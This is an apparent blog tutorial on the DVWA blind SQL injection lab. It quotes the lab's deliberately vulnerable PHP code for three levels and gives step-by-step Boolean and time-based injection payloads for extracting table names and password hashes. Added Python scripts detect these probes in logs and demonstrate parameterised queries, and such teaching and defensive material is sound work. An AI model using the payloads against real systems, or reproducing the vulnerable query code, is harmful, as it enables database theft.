DVWA: SQL Injection Blind (blind SQL injection)

Blind SQL injection introduction:

Blind injection differs from ordinary injection in that with ordinary injection the attacker can see the result of the injected statement directly on the page, whereas with blind injection the page does not display the result, and the attacker may not even know whether the injected statement executed. Blind injection is therefore harder than ordinary injection. It falls into three categories: Boolean-based blind injection, time-based blind injection, and error-based blind injection.

Blind injection steps:

1. Determine whether injection exists and whether it is character (string) or numeric injection
2. Guess the name of the current database
3. Guess the table names in the database
4. Guess the column names in the table
5. Guess the data


Low level:

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_GET[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    mysql_close(); 
} 

?> 

As you can see, the Low-level code does no checking or filtering at all on the id parameter, so there is an obvious SQL injection vulnerability.

The page shows "User ID exists in the database." when a matching row is found,

and "User ID is MISSING from the database." when none is found.

Method one: Boolean-based blind injection

1. Determine whether injection exists, and the injection type

Input 1: output exists.

Input 1' and 1=1 #: output exists.

Input 1' and 1=2 #: output MISSING.

So there is character-based (string) blind injection.

2. Guess the database name

First guess the length of the database name: 1' and length(database())=1 # shows MISSING, and so on, until 1' and length(database())=4 # shows exists. So the database name is 4 characters long.

Then use binary search to guess the database name character by character.

Input 1' and ascii(substr(database(),1,1))>88 #: output exists, so the ASCII value of the first character of the database name is greater than 88.

Input 1' and ascii(substr(database(),1,1))<110 #: output exists, so the ASCII value of the first character is less than 110.

Continue narrowing the range until the exact value is found. By experiment the ASCII value of the first character is 100; look up the corresponding letter in the ASCII table (d).

Input 1' and ascii(substr(database(),2,1))>88 # to search for the second character, and so on.

Repeating the above steps gives the database name dvwa.

3. Guess the table names in the database

First guess the number of tables: 1' and (select count(table_name) from information_schema.tables where table_schema=database())>5 #: output MISSING.

Then 1' and (select count(table_name) from information_schema.tables where table_schema=database())>2 #: output MISSING.

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #: output exists.

So there are two tables. Now guess the length of the first table name.

Input 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #: output MISSING.

Binary search: 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>5 #: output exists.

Until 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #: output exists, i.e. the first table name is 9 characters long.

Now guess the first letter of the first table name:

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #

Until 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 #: output exists, i.e. the letter g.

Then guess the remaining letters the same way: u, e, s, t, b, o, o, k, giving the table name guestbook.

Then guess the second table:

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>88 #

...

The second table is users.

 

4. Guess the column names

Take the users table as the example.

Guess the number of columns in the table: 1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 # (intermediate steps omitted): there are 8 columns.

By the conventional process you would now guess each column name of the users table, starting from the first column and guessing every character of it until the full name is obtained, then the 2nd, 3rd, ... 8th column name. When there are many columns and the names are long, guessing by hand like this takes a great deal of time. With limited time, and given that some columns matter less and do not need much attention, it is better to first obtain the few columns that hold key information, such as the username and password.

[Guess] the column names that may be used in the database:
username: username / user_name / uname / u_name / user / name / ...
password: password / pass_word / pwd / pass / ...

So our command can be 1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #: output exists.

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #: output exists.

So we know the users table has the columns user and password. You can also try the other names.

 

Guess the field values in the table

Use the same binary search; only the final step is written out here:

Value of the user field: 1' and length(substr((select user from users limit 0,1),1))=5 #: output exists,

- so the value in the user field is 5 characters long.

Value of the password field: 1' and length(substr((select password from users limit 0,1),1))=32 #,

- so the value in the password field is 32 characters long (a password of this length was most likely stored with MD5).

Then use binary search to guess the value of the user field (the username):

1' and ascii(substr((select user from users limit 0,1),1,1))=xxx # (first character)

1' and ascii(substr((select user from users limit 0,1),2,1))=xxx # (second character)

...

Guess the value of the password field (the password):

1' and ascii(substr((select password from users limit 0,1),1,1))=xxx # (first character)

...

 

Method two: time-based blind injection

1. Determine whether injection exists and whether it is character or numeric injection

Input 1' and sleep(5) #: a noticeable delay;

Input 1 and sleep(5) #: no delay;

This indicates character-based, time-based blind injection.

2. Guess the name of the current database

(The guessing method is described above; only the results are given here.) 1' and if(length(database())=4,sleep(5),1) #: noticeable delay, so the database name is 4 characters long.

Then binary search the database name: 1' and if(ascii(substr(database(),1,1))=100,sleep(5),1) #: noticeable delay, so the first character of the database name is d.

Repeat the above steps to find that the database is called dvwa.

3. Guess the table names in the database

First guess the number of tables in the database: 1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1) #: delay, so there are two tables.

Then guess the length of the first table name: 1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #: delay, so the first table name is 9 characters long.

Binary search then gives the table name.

4. Guess the column names in the table

Again guess the number of columns in the users table: 1' and if((select count(column_name) from information_schema.columns where table_name='users')=8,sleep(5),1) #: noticeable delay, indicating 8 columns.

Then guess the length of the first column name: 1' and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,sleep(5),1) #: noticeable delay, indicating that the first column name is 7 characters long.

Then binary search as before...

5. Guess the data

Binary search in the same way; the process is given above.

(Because there are too many commands, and the output on success looks the same every time, no screenshots are included.)
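From the defender's side, as an added example that is not part of the original post: this Python script scans constructed web-server log lines for the probe signatures used by the two methods above (the 1' and 1=2 check, ascii(substr(...)) character extraction, information_schema enumeration, and sleep()) and counts hits per client, since blind injection needs many probes rather than one request. The log lines, IP addresses and rule names are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed web-server log lines (not from a real server). The query strings
# are URL-encoded versions of the Boolean and time-based probes used above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2020:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4123
10.0.0.7 - - [01/Mar/2020:10:00:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+1%3D2+%23&Submit=Submit HTTP/1.1" 404 4130
10.0.0.7 - - [01/Mar/2020:10:00:03 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E88+%23&Submit=Submit HTTP/1.1" 200 4123
10.0.0.7 - - [01/Mar/2020:10:00:04 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+%28select+count%28table_name%29+from+information_schema.tables+where+table_schema%3Ddatabase%28%29%29%3E5+%23&Submit=Submit HTTP/1.1" 404 4130
10.0.0.7 - - [01/Mar/2020:10:00:09 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+if%28length%28database%28%29%29%3D4%2Csleep%285%29%2C1%29+%23&Submit=Submit HTTP/1.1" 200 4123
10.0.0.9 - - [01/Mar/2020:10:00:10 +0000] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4123
"""

# Common log format: client IP, bracketed timestamp, quoted request line, status code.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Rules run against the decoded, lower-cased, whitespace-collapsed query string.
RULES = [
    ("boolean_probe", re.compile(r"'\s*and\s+\d+\s*=\s*\d+")),
    ("char_extraction", re.compile(r"ascii\s*\(\s*substr\s*\(")),
    ("schema_enum", re.compile(r"information_schema\.")),
    ("time_probe", re.compile(r"sleep\s*\(\s*\d+")),
]

def normalise(query):
    # Decode first: the probes arrive as %27, %28, %2C and '+' for space.
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()

def scan(log_text):
    """Return (hits, per_ip): hits holds one (ip, status, matched rule names) tuple
    per suspicious request; per_ip counts hits per client, the useful signal here."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = normalise(m.group("path").partition("?")[2])
        matched = [name for name, rx in RULES if rx.search(query)]
        if matched:
            hits.append((m.group("ip"), m.group("status"), matched))
    return hits, Counter(ip for ip, _, _ in hits)

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG)[0]:
        print(hit)
```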

 

Medium level:

<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 
    $id = mysql_real_escape_string( $id ); 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    //mysql_close(); 
} 

?> 

As you can see, the Medium-level code escapes special characters with mysql_real_escape_string, and the front end provides a drop-down selection form, hoping to control the user's input.

This situation is similar to the previous manual SQL injection article: the request can be captured and the id parameter modified to inject. Because $id is not quoted in the query, escaping quote characters does not stop a numeric injection.

It is not repeated here; refer to the previous article and the Low-level tutorial above.
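As an added example (not code from the original post or from DVWA), the following Python script rebuilds the Low-level query (quoted, unescaped) and the Medium-level query (escaped but unquoted) against an in-memory SQLite copy of a users table, and contrasts both with a parameterised query, which is the fix for all three levels. SQLite accepts only -- comments and doubles quotes instead of backslash-escaping them, so MySQL's # and mysql_real_escape_string are represented that way; the table rows are constructed.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sample rows, not DVWA's real data).
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'Gordon', 'Brown');
""")

def escape(value):
    """Escape quotes the way a mysql_real_escape_string-style filter does.
    SQLite doubles the quote where MySQL uses a backslash; the effect is the same:
    the quote can no longer end the string literal, but SQL structure is untouched."""
    return value.replace("'", "''")

def lookup(id_value, quoted, escaped):
    """Build the query as the DVWA levels do: Low is quoted and unescaped,
    Medium is escaped but unquoted. Returns True/False like the exists/MISSING
    message, or None if the SQL fails to parse."""
    value = escape(id_value) if escaped else id_value
    literal = f"'{value}'" if quoted else value
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {literal}"
    try:
        return _DB.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return None

def safe_lookup(id_value):
    """Parameterised form: the value is bound, never spliced into the SQL text,
    so it is only ever compared with user_id and cannot add conditions."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return _DB.execute(sql, (id_value,)).fetchone() is not None

if __name__ == "__main__":
    # MySQL's '#' comment is written as '-- ' because SQLite only accepts the latter.
    print("Low, 1' and 1=1 -- :", lookup("1' and 1=1 -- ", quoted=True, escaped=False))   # True
    print("Low, 1' and 1=2 -- :", lookup("1' and 1=2 -- ", quoted=True, escaped=False))   # False
    print("Low + escaping     :", lookup("1' and 1=1 -- ", quoted=True, escaped=True))    # False
    print("Medium, 0 or 1=1   :", lookup("0 or 1=1", quoted=False, escaped=True))          # True
    print("Parameterised      :", safe_lookup("0 or 1=1"), safe_lookup("1' and 1=1 -- "))  # False False
```

The Boolean oracle is visible in the first two lines (same id, different answers); escaping closes it only in the quoted Low query, while the unquoted Medium query still accepts "0 or 1=1" for a user that does not exist, and only the bound parameter refuses both.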

 

High level:

<?php 

if( isset( $_COOKIE[ 'id' ] ) ) { 
    // Get input 
    $id = $_COOKIE[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Might sleep a random amount 
        if( rand( 0, 5 ) == 3 ) { 
            sleep( rand( 2, 4 ) ); 
        } 

        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    mysql_close(); 
} 

?> 

As you can see, the High-level code passes the id parameter through a cookie, and when the SQL query returns no result it may call sleep(seconds); the purpose is to disrupt time-based blind injection.

It also adds LIMIT 1 to the SQL query, hoping to restrict the output to a single result, but we can comment it out with #.

This is like the previous SQL injection level, but because the server side calls sleep, the accuracy of time-based blind injection is affected, so here only Boolean-based blind injection can be used.

The commands are the same as for the Low level; try them yourself.

 


Origin www.cnblogs.com/qi-yuan/p/12448248.html